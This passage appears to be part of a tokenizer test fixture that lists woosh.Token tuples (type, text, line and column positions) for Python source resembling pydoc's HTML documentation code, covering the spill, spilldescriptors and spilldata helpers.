woosh.Token(woosh.NAME, 'self', 882, 39, 882, 43),
woosh.Token(woosh.OP, '.', 882, 43, 882, 44),
woosh.Token(woosh.NAME, 'classlink', 882, 44, 882, 53),
woosh.Token(woosh.OP, '(', 882, 53, 882, 54),
woosh.Token(woosh.NAME, 'base', 882, 54, 882, 58),
woosh.Token(woosh.OP, ',', 882, 58, 882, 59),
woosh.Token(woosh.NAME, 'object', 883, 54, 883, 60),
woosh.Token(woosh.OP, '.', 883, 60, 883, 61),
woosh.Token(woosh.NAME, '__module__', 883, 61, 883, 71),
woosh.Token(woosh.OP, ')', 883, 71, 883, 72),
woosh.Token(woosh.OP, ')', 883, 72, 883, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 883, 73, 884, 0),
woosh.Token(woosh.DEDENT, ' ', 884, 0, 884, 12),
woosh.Token(woosh.NAME, 'push', 884, 12, 884, 16),
woosh.Token(woosh.OP, '(', 884, 16, 884, 17),
woosh.Token(woosh.STRING, "'</dl>\\n'", 884, 17, 884, 26),
woosh.Token(woosh.OP, ')', 884, 26, 884, 27),
woosh.Token(woosh.NEWLINE, '\r\n', 884, 27, 885, 0),
woosh.Token(woosh.DEDENT, ' ', 886, 0, 886, 8),
woosh.Token(woosh.NAME, 'def', 886, 8, 886, 11),
woosh.Token(woosh.NAME, 'spill', 886, 12, 886, 17),
woosh.Token(woosh.OP, '(', 886, 17, 886, 18),
woosh.Token(woosh.NAME, 'msg', 886, 18, 886, 21),
woosh.Token(woosh.OP, ',', 886, 21, 886, 22),
woosh.Token(woosh.NAME, 'attrs', 886, 23, 886, 28),
woosh.Token(woosh.OP, ',', 886, 28, 886, 29),
woosh.Token(woosh.NAME, 'predicate', 886, 30, 886, 39),
woosh.Token(woosh.OP, ')', 886, 39, 886, 40),
woosh.Token(woosh.OP, ':', 886, 40, 886, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 886, 41, 887, 0),
woosh.Token(woosh.INDENT, ' ', 887, 0, 887, 12),
woosh.Token(woosh.NAME, 'ok', 887, 12, 887, 14),
woosh.Token(woosh.OP, ',', 887, 14, 887, 15),
woosh.Token(woosh.NAME, 'attrs', 887, 16, 887, 21),
woosh.Token(woosh.OP, '=', 887, 22, 887, 23),
woosh.Token(woosh.NAME, '_split_list', 887, 24, 887, 35),
woosh.Token(woosh.OP, '(', 887, 35, 887, 36),
woosh.Token(woosh.NAME, 'attrs', 887, 36, 887, 41),
woosh.Token(woosh.OP, ',', 887, 41, 887, 42),
woosh.Token(woosh.NAME, 'predicate', 887, 43, 887, 52),
woosh.Token(woosh.OP, ')', 887, 52, 887, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 887, 53, 888, 0),
woosh.Token(woosh.NAME, 'if', 888, 12, 888, 14),
woosh.Token(woosh.NAME, 'ok', 888, 15, 888, 17),
woosh.Token(woosh.OP, ':', 888, 17, 888, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 888, 18, 889, 0),
woosh.Token(woosh.INDENT, ' ', 889, 0, 889, 16),
woosh.Token(woosh.NAME, 'hr', 889, 16, 889, 18),
woosh.Token(woosh.OP, '.', 889, 18, 889, 19),
woosh.Token(woosh.NAME, 'maybe', 889, 19, 889, 24),
woosh.Token(woosh.OP, '(', 889, 24, 889, 25),
woosh.Token(woosh.OP, ')', 889, 25, 889, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 889, 26, 890, 0),
woosh.Token(woosh.NAME, 'push', 890, 16, 890, 20),
woosh.Token(woosh.OP, '(', 890, 20, 890, 21),
woosh.Token(woosh.NAME, 'msg', 890, 21, 890, 24),
woosh.Token(woosh.OP, ')', 890, 24, 890, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 890, 25, 891, 0),
woosh.Token(woosh.NAME, 'for', 891, 16, 891, 19),
woosh.Token(woosh.NAME, 'name', 891, 20, 891, 24),
woosh.Token(woosh.OP, ',', 891, 24, 891, 25),
woosh.Token(woosh.NAME, 'kind', 891, 26, 891, 30),
woosh.Token(woosh.OP, ',', 891, 30, 891, 31),
woosh.Token(woosh.NAME, 'homecls', 891, 32, 891, 39),
woosh.Token(woosh.OP, ',', 891, 39, 891, 40),
woosh.Token(woosh.NAME, 'value', 891, 41, 891, 46),
woosh.Token(woosh.NAME, 'in', 891, 47, 891, 49),
woosh.Token(woosh.NAME, 'ok', 891, 50, 891, 52),
woosh.Token(woosh.OP, ':', 891, 52, 891, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 891, 53, 892, 0),
woosh.Token(woosh.INDENT, ' ', 892, 0, 892, 20),
woosh.Token(woosh.NAME, 'try', 892, 20, 892, 23),
woosh.Token(woosh.OP, ':', 892, 23, 892, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 892, 24, 893, 0),
woosh.Token(woosh.INDENT, ' ', 893, 0, 893, 24),
woosh.Token(woosh.NAME, 'value', 893, 24, 893, 29),
woosh.Token(woosh.OP, '=', 893, 30, 893, 31),
woosh.Token(woosh.NAME, 'getattr', 893, 32, 893, 39),
woosh.Token(woosh.OP, '(', 893, 39, 893, 40),
woosh.Token(woosh.NAME, 'object', 893, 40, 893, 46),
woosh.Token(woosh.OP, ',', 893, 46, 893, 47),
woosh.Token(woosh.NAME, 'name', 893, 48, 893, 52),
woosh.Token(woosh.OP, ')', 893, 52, 893, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 893, 53, 894, 0),
woosh.Token(woosh.DEDENT, ' ', 894, 0, 894, 20),
woosh.Token(woosh.NAME, 'except', 894, 20, 894, 26),
woosh.Token(woosh.NAME, 'Exception', 894, 27, 894, 36),
woosh.Token(woosh.OP, ':', 894, 36, 894, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 894, 37, 895, 0),
woosh.Token(woosh.COMMENT, '# Some descriptors may meet a failure in their __get__.', 895, 24, 895, 79),
woosh.Token(woosh.COMMENT, '# (bug #1785)', 896, 24, 896, 37),
woosh.Token(woosh.INDENT, ' ', 897, 0, 897, 24),
woosh.Token(woosh.NAME, 'push', 897, 24, 897, 28),
woosh.Token(woosh.OP, '(', 897, 28, 897, 29),
woosh.Token(woosh.NAME, 'self', 897, 29, 897, 33),
woosh.Token(woosh.OP, '.', 897, 33, 897, 34),
woosh.Token(woosh.NAME, 'docdata', 897, 34, 897, 41),
woosh.Token(woosh.OP, '(', 897, 41, 897, 42),
woosh.Token(woosh.NAME, 'value', 897, 42, 897, 47),
woosh.Token(woosh.OP, ',', 897, 47, 897, 48),
woosh.Token(woosh.NAME, 'name', 897, 49, 897, 53),
woosh.Token(woosh.OP, ',', 897, 53, 897, 54),
woosh.Token(woosh.NAME, 'mod', 897, 55, 897, 58),
woosh.Token(woosh.OP, ')', 897, 58, 897, 59),
woosh.Token(woosh.OP, ')', 897, 59, 897, 60),
woosh.Token(woosh.NEWLINE, '\r\n', 897, 60, 898, 0),
woosh.Token(woosh.DEDENT, ' ', 898, 0, 898, 20),
woosh.Token(woosh.NAME, 'else', 898, 20, 898, 24),
woosh.Token(woosh.OP, ':', 898, 24, 898, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 898, 25, 899, 0),
woosh.Token(woosh.INDENT, ' ', 899, 0, 899, 24),
woosh.Token(woosh.NAME, 'push', 899, 24, 899, 28),
woosh.Token(woosh.OP, '(', 899, 28, 899, 29),
woosh.Token(woosh.NAME, 'self', 899, 29, 899, 33),
woosh.Token(woosh.OP, '.', 899, 33, 899, 34),
woosh.Token(woosh.NAME, 'document', 899, 34, 899, 42),
woosh.Token(woosh.OP, '(', 899, 42, 899, 43),
woosh.Token(woosh.NAME, 'value', 899, 43, 899, 48),
woosh.Token(woosh.OP, ',', 899, 48, 899, 49),
woosh.Token(woosh.NAME, 'name', 899, 50, 899, 54),
woosh.Token(woosh.OP, ',', 899, 54, 899, 55),
woosh.Token(woosh.NAME, 'mod', 899, 56, 899, 59),
woosh.Token(woosh.OP, ',', 899, 59, 899, 60),
woosh.Token(woosh.NAME, 'funcs', 900, 40, 900, 45),
woosh.Token(woosh.OP, ',', 900, 45, 900, 46),
woosh.Token(woosh.NAME, 'classes', 900, 47, 900, 54),
woosh.Token(woosh.OP, ',', 900, 54, 900, 55),
woosh.Token(woosh.NAME, 'mdict', 900, 56, 900, 61),
woosh.Token(woosh.OP, ',', 900, 61, 900, 62),
woosh.Token(woosh.NAME, 'object', 900, 63, 900, 69),
woosh.Token(woosh.OP, ')', 900, 69, 900, 70),
woosh.Token(woosh.OP, ')', 900, 70, 900, 71),
woosh.Token(woosh.NEWLINE, '\r\n', 900, 71, 901, 0),
woosh.Token(woosh.DEDENT, ' ', 901, 0, 901, 20),
woosh.Token(woosh.NAME, 'push', 901, 20, 901, 24),
woosh.Token(woosh.OP, '(', 901, 24, 901, 25),
woosh.Token(woosh.STRING, "'\\n'", 901, 25, 901, 29),
woosh.Token(woosh.OP, ')', 901, 29, 901, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 901, 30, 902, 0),
woosh.Token(woosh.DEDENT, ' ', 902, 0, 902, 12),
woosh.Token(woosh.DEDENT, '', 902, 12, 902, 12),
woosh.Token(woosh.NAME, 'return', 902, 12, 902, 18),
woosh.Token(woosh.NAME, 'attrs', 902, 19, 902, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 902, 24, 903, 0),
woosh.Token(woosh.DEDENT, ' ', 904, 0, 904, 8),
woosh.Token(woosh.NAME, 'def', 904, 8, 904, 11),
woosh.Token(woosh.NAME, 'spilldescriptors', 904, 12, 904, 28),
woosh.Token(woosh.OP, '(', 904, 28, 904, 29),
woosh.Token(woosh.NAME, 'msg', 904, 29, 904, 32),
woosh.Token(woosh.OP, ',', 904, 32, 904, 33),
woosh.Token(woosh.NAME, 'attrs', 904, 34, 904, 39),
woosh.Token(woosh.OP, ',', 904, 39, 904, 40),
woosh.Token(woosh.NAME, 'predicate', 904, 41, 904, 50),
woosh.Token(woosh.OP, ')', 904, 50, 904, 51),
woosh.Token(woosh.OP, ':', 904, 51, 904, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 904, 52, 905, 0),
woosh.Token(woosh.INDENT, ' ', 905, 0, 905, 12),
woosh.Token(woosh.NAME, 'ok', 905, 12, 905, 14),
woosh.Token(woosh.OP, ',', 905, 14, 905, 15),
woosh.Token(woosh.NAME, 'attrs', 905, 16, 905, 21),
woosh.Token(woosh.OP, '=', 905, 22, 905, 23),
woosh.Token(woosh.NAME, '_split_list', 905, 24, 905, 35),
woosh.Token(woosh.OP, '(', 905, 35, 905, 36),
woosh.Token(woosh.NAME, 'attrs', 905, 36, 905, 41),
woosh.Token(woosh.OP, ',', 905, 41, 905, 42),
woosh.Token(woosh.NAME, 'predicate', 905, 43, 905, 52),
woosh.Token(woosh.OP, ')', 905, 52, 905, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 905, 53, 906, 0),
woosh.Token(woosh.NAME, 'if', 906, 12, 906, 14),
woosh.Token(woosh.NAME, 'ok', 906, 15, 906, 17),
woosh.Token(woosh.OP, ':', 906, 17, 906, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 906, 18, 907, 0),
woosh.Token(woosh.INDENT, ' ', 907, 0, 907, 16),
woosh.Token(woosh.NAME, 'hr', 907, 16, 907, 18),
woosh.Token(woosh.OP, '.', 907, 18, 907, 19),
woosh.Token(woosh.NAME, 'maybe', 907, 19, 907, 24),
woosh.Token(woosh.OP, '(', 907, 24, 907, 25),
woosh.Token(woosh.OP, ')', 907, 25, 907, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 907, 26, 908, 0),
woosh.Token(woosh.NAME, 'push', 908, 16, 908, 20),
woosh.Token(woosh.OP, '(', 908, 20, 908, 21),
woosh.Token(woosh.NAME, 'msg', 908, 21, 908, 24),
woosh.Token(woosh.OP, ')', 908, 24, 908, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 908, 25, 909, 0),
woosh.Token(woosh.NAME, 'for', 909, 16, 909, 19),
woosh.Token(woosh.NAME, 'name', 909, 20, 909, 24),
woosh.Token(woosh.OP, ',', 909, 24, 909, 25),
woosh.Token(woosh.NAME, 'kind', 909, 26, 909, 30),
woosh.Token(woosh.OP, ',', 909, 30, 909, 31),
woosh.Token(woosh.NAME, 'homecls', 909, 32, 909, 39),
woosh.Token(woosh.OP, ',', 909, 39, 909, 40),
woosh.Token(woosh.NAME, 'value', 909, 41, 909, 46),
woosh.Token(woosh.NAME, 'in', 909, 47, 909, 49),
woosh.Token(woosh.NAME, 'ok', 909, 50, 909, 52),
woosh.Token(woosh.OP, ':', 909, 52, 909, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 909, 53, 910, 0),
woosh.Token(woosh.INDENT, ' ', 910, 0, 910, 20),
woosh.Token(woosh.NAME, 'push', 910, 20, 910, 24),
woosh.Token(woosh.OP, '(', 910, 24, 910, 25),
woosh.Token(woosh.NAME, 'self', 910, 25, 910, 29),
woosh.Token(woosh.OP, '.', 910, 29, 910, 30),
woosh.Token(woosh.NAME, 'docdata', 910, 30, 910, 37),
woosh.Token(woosh.OP, '(', 910, 37, 910, 38),
woosh.Token(woosh.NAME, 'value', 910, 38, 910, 43),
woosh.Token(woosh.OP, ',', 910, 43, 910, 44),
woosh.Token(woosh.NAME, 'name', 910, 45, 910, 49),
woosh.Token(woosh.OP, ',', 910, 49, 910, 50),
woosh.Token(woosh.NAME, 'mod', 910, 51, 910, 54),
woosh.Token(woosh.OP, ')', 910, 54, 910, 55),
woosh.Token(woosh.OP, ')', 910, 55, 910, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 910, 56, 911, 0),
woosh.Token(woosh.DEDENT, ' ', 911, 0, 911, 12),
woosh.Token(woosh.DEDENT, '', 911, 12, 911, 12),
woosh.Token(woosh.NAME, 'return', 911, 12, 911, 18),
woosh.Token(woosh.NAME, 'attrs', 911, 19, 911, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 911, 24, 912, 0),
woosh.Token(woosh.DEDENT, ' ', 913, 0, 913, 8),
woosh.Token(woosh.NAME, 'def', 913, 8, 913, 11),
woosh.Token(woosh.NAME, 'spilldata', 913, 12, 913, 21),
woosh.Token(woosh.OP, '(', 913, 21, 913, 22),
woosh.Token(woosh.NAME, 'msg', 913, 22, 913, 25),
woosh.Token(woosh.OP, ',', 913, 25, 913, 26),
woosh.Token(woosh.NAME, 'attrs', 913, 27, 913, 32),
woosh.Token(woosh.OP, ',', 913, 32, 913, 33),
woosh.Token(woosh.NAME, 'predicate', 913, 34, 913, 43),
woosh.Token(woosh.OP, ')', 913, 43, 913, 44),
woosh.Token(woosh.OP, ':', 913, 44, 913, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 913, 45, 914, 0),
woosh.Token(woosh.INDENT, ' ', 914, 0, 914, 12),
woosh.Token(woosh.NAME, 'ok', 914, 12, 914, 14),
woosh.Token(woosh.OP, ',', 914, 14, 914, 15),
woosh.Token(woosh.NAME, 'attrs', 914, 16, 914, 21),
woosh.Token(woosh.OP, '=', 914, 22, 914, 23),
woosh.Token(woosh.NAME, '_split_list', 914, 24, 914, 35),
woosh.Token(woosh.OP, '(', 914, 35, 914, 36),
woosh.Token(woosh.NAME, 'attrs', 914, 36, 914, 41),
woosh.Token(woosh.OP, ',', 914, 41, 914, 42),
woosh.Token(woosh.NAME, 'predicate', 914, 43, 914, 52),
woosh.Token(woosh.OP, ')', 914, 52, 914, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 914, 53, 915, 0),
woosh.Token(woosh.NAME, 'if', 915, 12, 915, 14),
woosh.Token(woosh.NAME, 'ok', 915, 15, 915, 17),
woosh.Token(woosh.OP, ':', 915, 17, 915, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 915, 18, 916, 0),
woosh.Token(woosh.INDENT, ' ', 916, 0, 916, 16),
woosh.Token(woosh.NAME, 'hr', 916, 16, 916, 18),
woosh.Token(woosh.OP, '.', 916, 18, 916, 19),
woosh.Token(woosh.NAME, 'maybe', 916, 19, 916, 24),
woosh.Token(woosh.OP, '(', 916, 24, 916, 25),
woosh.Token(woosh.OP, ')', 916, 25, 916, 26),
woosh.Token(woosh.NEWLINE, '\r\n', 916, 26, 917, 0),
woosh.Token(woosh.NAME, 'push', 917, 16, 917, 20),
woosh.Token(woosh.OP, '(', 917, 20, 917, 21),
woosh.Token(woosh.NAME, 'msg', 917, 21, 917, 24),
woosh.Token(woosh.OP, ')', 917, 24, 917, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 917, 25, 918, 0),
woosh.Token(woosh.NAME, 'for', 918, 16, 918, 19),
woosh.Token(woosh.NAME, 'name', 918, 20, 918, 24),
woosh.Token(woosh.OP, ',', 918, 24, 918, 25),
woosh.Token(woosh.NAME, 'kind', 918, 26, 918, 30),
woosh.Token(woosh.OP, ',', 918, 30, 918, 31),
woosh.Token(woosh.NAME, 'homecls', 918, 32, 918, 39),
woosh.Token(woosh.OP, ',', 918, 39, 918, 40),
woosh.Token(woosh.NAME, 'value', 918, 41, 918, 46),
woosh.Token(woosh.NAME, 'in', 918, 47, 918, 49),
woosh.Token(woosh.NAME, 'ok', 918, 50, 918, 52),
woosh.Token(woosh.OP, ':', 918, 52, 918, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 918, 53, 919, 0),
woosh.Token(woosh.INDENT, ' ', 919, 0, 919, 20),
woosh.Token(woosh.NAME, 'base', 919, 20, 919, 24),
woosh.Token(woosh.OP, '=', 919, 25, 919, 26),
woosh.Token(woosh.NAME, 'self', 919, 27, 919, 31),
woosh.Token(woosh.OP, '.', 919, 31, 919, 32),
woosh.Token(woosh.NAME, 'docother', 919, 32, 919, 40),
woosh.Token(woosh.OP, '(', 919, 40, 919, 41),
woosh.Token(woosh.NAME, 'getattr', 919, 41, 919, 48),
woosh.Token(woosh.OP, '(', 919, 48, 919, 49),
woosh.Token(woosh.NAME, 'object', 919, 49, 919, 55),
woosh.Token(woosh.OP, ',', 919, 55, 919, 56),
woosh.Token(woosh.NAME, 'name', 919, 57, 919, 61),
woosh.Token(woosh.OP, ')', 919, 61, 919, 62),
woosh.Token(woosh.OP, ',', 919, 62, 919, 63),
woosh.Token(woosh.NAME, 'name', 919, 64, 919, 68),
woosh.Token(woosh.OP, ',', 919, 68, 919, 69),
woosh.Token(woosh.NAME, 'mod', 919, 70, 919, 73),
woosh.Token(woosh.OP, ')', 919, 73, 919, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 919, 74, 920, 0),
woosh.Token(woosh.NAME, 'doc', 920, 20, 920, 23),
woosh.Token(woosh.OP, '=', 920, 24, 920, 25),
woosh.Token(woosh.NAME, 'getdoc', 920, 26, 920, 32),
woosh.Token(woosh.OP, '(', 920, 32, 920, 33),
woosh.Token(woosh.NAME, 'value', 920, 33, 920, 38),
woosh.Token(woosh.OP, ')', 920, 38, 920, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 920, 39, 921, 0),
woosh.Token(woosh.NAME, 'if', 921, 20, 921, 22),
woosh.Token(woosh.NAME, 'not', 921, 23, 921, 26),
woosh.Token(woosh.NAME, 'doc', 921, 27, 921, 30),
woosh.Token(woosh.OP, ':', 921, 30, 921, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 921, 31, 922, 0),
woosh.Token(woosh.INDENT, ' ', 922, 0, 922, 24),
woosh.Token(woosh.NAME, 'push', 922, 24, 922, 28),
woosh.Token(woosh.OP, '(', 922, 28, 922, 29),
woosh.Token(woosh.STRING, "'<dl><dt>%s</dl>\\n'", 922, 29, 922, 48),
woosh.Token(woosh.OP, '%', 922, 49, 922, 50),
woosh.Token(woosh.NAME, 'base', 922, 51, 922, 55),
woosh.Token(woosh.OP, ')', 922, 55, 922, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 922, 56, 923, 0),
woosh.Token(woosh.DEDENT, ' ', 923, 0, 923, 20),
woosh.Token(woosh.NAME, 'else', 923, 20, 923, 24),
woosh.Token(woosh.OP, ':', 923, 24, 923, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 923, 25, 924, 0),
woosh.Token(woosh.INDENT, ' ', 924, 0, 924, 24),
woosh.Token(woosh.NAME, 'doc', 924, 24, 924, 27),
woosh.Token(woosh.OP, '=', 924, 28, 924, 29),
woosh.Token(woosh.NAME, 'self', 924, 30, 924, 34),
woosh.Token(woosh.OP, '.', 924, 34, 924, 35),
woosh.Token(woosh.NAME, 'markup', 924, 35, 924, 41),
woosh.Token(woosh.OP, '(', 924, 41, 924, 42),
woosh.Token(woosh.NAME, 'getdoc', 924, 42, 924, 48),
woosh.Token(woosh.OP, '(', 924, 48, 924, 49),
woosh.Token(woosh.NAME, 'value', 924, 49, 924, 54),
woosh.Token(woosh.OP, ')', 924, 54, 924, 55),
woosh.Token(woosh.OP, ',', 924, 55, 924, 56),
woosh.Token(woosh.NAME, 'self', 924, 57, 924, 61),
woosh.Token(woosh.OP, '.', 924, 61, 924, 62),
woosh.Token(woosh.NAME, 'preformat', 924, 62, 924, 71),
woosh.Token(woosh.OP, ',', 924, 71, 924, 72),
woosh.Token(woosh.NAME, 'funcs', 925, 42, 925, 47),
woosh.Token(woosh.OP, ',', 925, 47, 925, 48),
woosh.Token(woosh.NAME, 'classes', 925, 49, 925, 56),
woosh.Token(woosh.OP, ',', 925, 56, 925, 57),
woosh.Token(woosh.NAME, 'mdict', 925, 58, 925, 63),
woosh.Token(woosh.OP, ')', 925, 63, 925, 64),
woosh.Token(woosh.NEWLINE, '\r\n', 925, 64, 926, 0),
woosh.Token(woosh.NAME, 'doc', 926, 24, 926, 27),
woosh.Token(woosh.OP, '=', 926, 28, 926, 29),
woosh.Token(woosh.STRING, "'<dd><tt>%s</tt>'", 926, 30, 926, 47),
woosh.Token(woosh.OP, '%', 926, 48, 926, 49),
woosh.Token(woosh.NAME, 'doc', 926, 50, 926, 53),
woosh.Token(woosh.NEWLINE, '\r\n', 926, 53, 927, 0),
woosh.Token(woosh.NAME, 'push', 927, 24, 927, 28),
woosh.Token(woosh.OP, '(', 927, 28, 927, 29),
woosh.Token(woosh.STRING, "'<dl><dt>%s%s</dl>\\n'", 927, 29, 927, 50),
woosh.Token(woosh.OP, '%', 927, 51, 927, 52),
woosh.Token(woosh.OP, '(', 927, 53, 927, 54),
woosh.Token(woosh.NAME, 'base', 927, 54, 927, 58),
woosh.Token(woosh.OP, ',', 927, 58, 927, 59),
woosh.Token(woosh.NAME, 'doc', 927, 60, 927, 63),
woosh.Token(woosh.OP, ')', 927, 63, 927, 64),
woosh.Token(woosh.OP, ')', 927, 64, 927, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 927, 65, 928, 0),
woosh.Token(woosh.DEDENT, ' ', 928, 0, 928, 20),
woosh.Token(woosh.NAME, 'push', 928, 20, 928, 24),
woosh.Token(woosh.OP, '(', 928, 24, 928, 25),
woosh.Token(woosh.STRING, "'\\n'", 928, 25, 928, 29),
woosh.Token(woosh.OP, ')', 928, 29, 928, 30),
woosh.Token(woosh.NEWLINE, '\r\n', 928, 30, 929, 0),
woosh.Token(woosh.DEDENT, ' ', 929, 0, 929, 12),
woosh.Token(woosh.DEDENT, '', 929, 12, 929, 12),
woosh.Token(woosh.NAME, 'return', 929, 12, 929, 18),
woosh.Token(woosh.NAME, 'attrs', 929, 19, 929, 24),
woosh.Token(woosh.NEWLINE, '\r\n', 929, 24, 930, 0),
woosh.Token(woosh.DEDENT, ' ', 931, 0, 931, 8),
woosh.Token(woosh.NAME, 'attrs', 931, 8, 931, 13),
woosh.Token(woosh.OP, '=', 931, 14, 931, 15),
woosh.Token(woosh.OP, '[', 931, 16, 931, 17),
woosh.Token(woosh.OP, '(', 931, 17, 931, 18),
woosh.Token(woosh.NAME, 'name', 931, 18, 931, 22),
woosh.Token(woosh.OP, ',', 931, 22, 931, 23),
woosh.Token(woosh.NAME, 'kind', 931, 24, 931, 28),
woosh.Token(woosh.OP, ',', 931, 28, 931, 29),
woosh.Token(woosh.NAME, 'cls', 931, 30, 931, 33),
woosh.Token(woosh.OP, ',', 931, 33, 931, 34),
woosh.Token(woosh.NAME, 'value', 931, 35, 931, 40),
woosh.Token(woosh.OP, ')', 931, 40, 931, 41),
woosh.Token(woosh.NAME, 'for', 932, 17, 932, 20),
woosh.Token(woosh.NAME, 'name', 932, 21, 932, 25),
woosh.Token(woosh.OP, ',', 932, 25, 932, 26),
woosh.Token(woosh.NAME, 'kind', 932, 27, 932, 31),
woosh.Token(woosh.OP, ',', 932, 31, 932, 32),
woosh.Token(woosh.NAME, 'cls', 932, 33, 932, 36),
woosh.Token(woosh.OP, ',', 932, 36, 932, 37),
woosh.Token(woosh.NAME, 'value', 932, 38, 932, 43),
woosh.Token(woosh.NAME, 'in', 932, 44, 932, 46),
woosh.Token(woosh.NAME, 'classify_class_attrs', 932, 47, 932, 67),
woosh.Token(woosh.OP, '(', 932, 67, 932, 68),
woosh.Token(woosh.NAME, 'object', 932, 68, 932, 74),
woosh.Token(woosh.OP, ')', 932, 74, 932, 75),
woosh.Token(woosh.NAME, 'if', 933, 17, 933, 19),
woosh.Token(woosh.NAME, 'visiblename', 933, 20, 933, 31),
woosh.Token(woosh.OP, '(', 933, 31, 933, 32),
woosh.Token(woosh.NAME, 'name', 933, 32, 933, 36),
woosh.Token(woosh.OP, ',', 933, 36, 933, 37),
woosh.Token(woosh.NAME, 'obj', 933, 38, 933, 41),
woosh.Token(woosh.OP, '=', 933, 41, 933, 42),
woosh.Token(woosh.NAME, 'object', 933, 42, 933, 48),
woosh.Token(woosh.OP, ')', 933, 48, 933, 49),
woosh.Token(woosh.OP, ']', 933, 49, 933, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 933, 50, 934, 0),
woosh.Token(woosh.NAME, 'mdict', 935, 8, 935, 13),
woosh.Token(woosh.OP, '=', 935, 14, 935, 15),
woosh.Token(woosh.OP, '{', 935, 16, 935, 17),
woosh.Token(woosh.OP, '}', 935, 17, 935, 18),
woosh.Token(woosh.NEWLINE, '\r\n', 935, 18, 936, 0),
woosh.Token(woosh.NAME, 'for', 936, 8, 936, 11),
woosh.Token(woosh.NAME, 'key', 936, 12, 936, 15),
woosh.Token(woosh.OP, ',', 936, 15, 936, 16),
woosh.Token(woosh.NAME, 'kind', 936, 17, 936, 21),
woosh.Token(woosh.OP, ',', 936, 21, 936, 22),
woosh.Token(woosh.NAME, 'homecls', 936, 23, 936, 30),
woosh.Token(woosh.OP, ',', 936, 30, 936, 31),
woosh.Token(woosh.NAME, 'value', 936, 32, 936, 37),
woosh.Token(woosh.NAME, 'in', 936, 38, 936, 40),
woosh.Token(woosh.NAME, 'attrs', 936, 41, 936, 46),
woosh.Token(woosh.OP, ':', 936, 46, 936, 47),
woosh.Token(woosh.NEWLINE, '\r\n', 936, 47, 937, 0),
woosh.Token(woosh.INDENT, ' ', 937, 0, 937, 12),
woosh.Token(woosh.NAME, 'mdict', 937, 12, 937, 17),
woosh.Token(woosh.OP, '[', 937, 17, 937, 18),
woosh.Token(woosh.NAME, 'key', 937, 18, 937, 21),
woosh.Token(woosh.OP, ']', 937, 21, 937, 22),
woosh.Token(woosh.OP, '=', 937, 23, 937, 24),
woosh.Token(woosh.NAME, 'anchor', 937, 25, 937, 31),
woosh.Token(woosh.OP, '=', 937, 32, 937, 33),
woosh.Token(woosh.STRING, "'#'", 937, 34, 937, 37),
woosh.Token(woosh.OP, '+', 937, 38, 937, 39),
woosh.Token(woosh.NAME, 'name', 937, 40, 937, 44),
woosh.Token(woosh.OP, '+', 937, 45, 937, 46),
woosh.Token(woosh.STRING, "'-'", 937, 47, 937, 50),
woosh.Token(woosh.OP, '+', 937, 51, 937, 52),
woosh.Token(woosh.NAME, 'key', 937, 53, 937, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 937, 56, 938, 0),
woosh.Token(woosh.NAME, 'try', 938, 12, 938, 15),
woosh.Token(woosh.OP, ':', 938, 15, 938, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 938, 16, 939, 0),
woosh.Token(woosh.INDENT, ' ', 939, 0, 939, 16),
woosh.Token(woosh.NAME, 'value', 939, 16, 939, 21),
woosh.Token(woosh.OP, '=', 939, 22, 939, 23),
woosh.Token(woosh.NAME, 'getattr', 939, 24, 939, 31),
woosh.Token(woosh.OP, '(', 939, 31, 939, 32),
woosh.Token(woosh.NAME, 'object', 939, 32, 939, 38),
woosh.Token(woosh.OP, ',', 939, 38, 939, 39),
woosh.Token(woosh.NAME, 'name', 939, 40, 939, 44),
woosh.Token(woosh.OP, ')', 939, 44, 939, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 939, 45, 940, 0),
woosh.Token(woosh.DEDENT, ' ', 940, 0, 940, 12),
woosh.Token(woosh.NAME, 'except', 940, 12, 940, 18),
woosh.Token(woosh.NAME, 'Exception', 940, 19, 940, 28),
woosh.Token(woosh.OP, ':', 940, 28, 940, 29),
woosh.Token(woosh.NEWLINE, '\r\n', 940, 29, 941, 0),
woosh.Token(woosh.COMMENT, '# Some descriptors may meet a failure in their __get__.', 941, 16, 941, 71),
woosh.Token(woosh.COMMENT, '# (bug #1785)', 942, 16, 942, 29),
woosh.Token(woosh.INDENT, ' ', 943, 0, 943, 16),
woosh.Token(woosh.NAME, 'pass', 943, 16, 943, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 943, 20, 944, 0),
woosh.Token(woosh.DEDENT, ' ', 944, 0, 944, 12),
woosh.Token(woosh.NAME, 'try', 944, 12, 944, 15),
woosh.Token(woosh.OP, ':', 944, 15, 944, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 944, 16, 945, 0),
woosh.Token(woosh.COMMENT, '# The value may not be hashable (e.g., a data attr with', 945, 16, 945, 71),
woosh.Token(woosh.COMMENT, '# a dict or list value).', 946, 16, 946, 40),
